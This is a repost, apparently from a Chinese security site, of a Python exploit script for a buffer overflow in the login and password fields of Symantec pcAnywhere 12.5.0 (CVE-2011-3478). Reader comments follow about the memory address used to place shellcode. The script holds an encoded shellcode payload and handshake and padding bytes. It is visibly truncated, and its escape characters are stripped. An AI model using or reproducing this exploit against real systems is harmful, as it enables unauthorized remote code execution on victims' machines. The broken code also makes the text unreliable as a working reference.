Symantec pcAnywhere 可登录名和密码字段缓冲区溢出

#!/usr/bin/python

# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478

# Code :
import socket
import time
import struct
import string
import sys

shell = (
"xdaxdaxbbx9ex7fxfbx04xd9x74x24xf4x58x2bxc9"
"xb1x56x31x58x18x03x58x18x83xc0x9ax9dx0exf8"
"x4axe8xf1x01x8ax8bx78xe4xbbx99x1fx6cxe9x2d"
"x6bx20x01xc5x39xd1x92xabx95xd6x13x01xc0xd9"
"xa4xa7xccxb6x66xa9xb0xc4xbax09x88x06xcfx48"
"xcdx7bx3fx18x86xf0xedx8dxa3x45x2dxafx63xc2"
"x0dxd7x06x15xf9x6dx08x46x51xf9x42x7exdaxa5"
"x72x7fx0fxb6x4fx36x24x0dx3bxc9xecx5fxc4xfb"
"xd0x0cxfbx33xddx4dx3bxf3x3dx38x37x07xc0x3b"
"x8cx75x1exc9x11xddxd5x69xf2xdfx3axefx71xd3"
"xf7x7bxddxf0x06xafx55x0cx83x4exbax84xd7x74"
"x1exccx8cx15x07xa8x63x29x57x14xdcx8fx13xb7"
"x09xa9x79xd0xfex84x81x20x68x9exf2x12x37x34"
"x9dx1exb0x92x5ax60xebx63xf4x9fx13x94xdcx5b"
"x47xc4x76x4dxe7x8fx86x72x32x1fxd7xdcxecxe0"
"x87x9cx5cx89xcdx12x83xa9xedxf8xb2xedx23xd8"
"x97x99x41xdex06x06xcfx38x42xa6x99x93xfax04"
"xfex2bx9dx77xd4x07x36xe0x60x4ex80x0fx71x44"
"xa3xbcxd9x0fx37xafxddx2ex48xfax75x38x71x6d"
"x0fx54x30x0fx10x7dxa2xacx83x1ax32xbaxbfxb4"
"x65xebx0excdxe3x01x28x67x11xd8xacx40x91x07"
"x0dx4ex18xc5x29x74x0ax13xb1x30x7excbxe4xee"
"x28xadx5ex41x82x67x0cx0bx42xf1x7ex8cx14xfe"
"xaax7axf8x4fx03x3bx07x7fxc3xcbx70x9dx73x33"
"xabx25x83x7exf1x0cx0cx27x60x0dx51xd8x5fx52"
"x6cx5bx55x2bx8bx43x1cx2exd7xc3xcdx42x48xa6"
"xf1xf1x69xe3"
)
init1 = (
"x00x00x00x00" # kezdeti handshake
)

init2 = (
"x0dx06xfe" # Enter username uzenet koveti (NTdialog)
)

init3 = (
"A" * 100 #+ "r" #username
)

readable_xp_sp2 = struct.pack('

	摘自：http://www.exploit-db.com/exploits/19407/

留言评论（旧系统）：


leadurlife @ 2012-07-12 07:33:11
核大，readable_xp_sp2 这是什么地址？
本站回复：
readable_xp_sp2 = struct.pack('


晴天小铸 @ 2012-07-12 11:18:26
回复这个文章的第一个吐槽网页,那个地址是一个win的可控地址:放shellcode的,有工具可以获得.不同操作系统不同的。
一般来说可以使用,如果对方有软件或者硬件防范的话没那么简单了,随机+监控=难道 建议看看这本书:
黑客防线2009缓冲区溢出攻击与防范专辑.pdf
本站回复：
readable_xp_sp2，windows xp sp3 可读地址。


    

文章来源于lcx.cc:Symantec pcAnywhere 可登录名和密码字段缓冲区溢出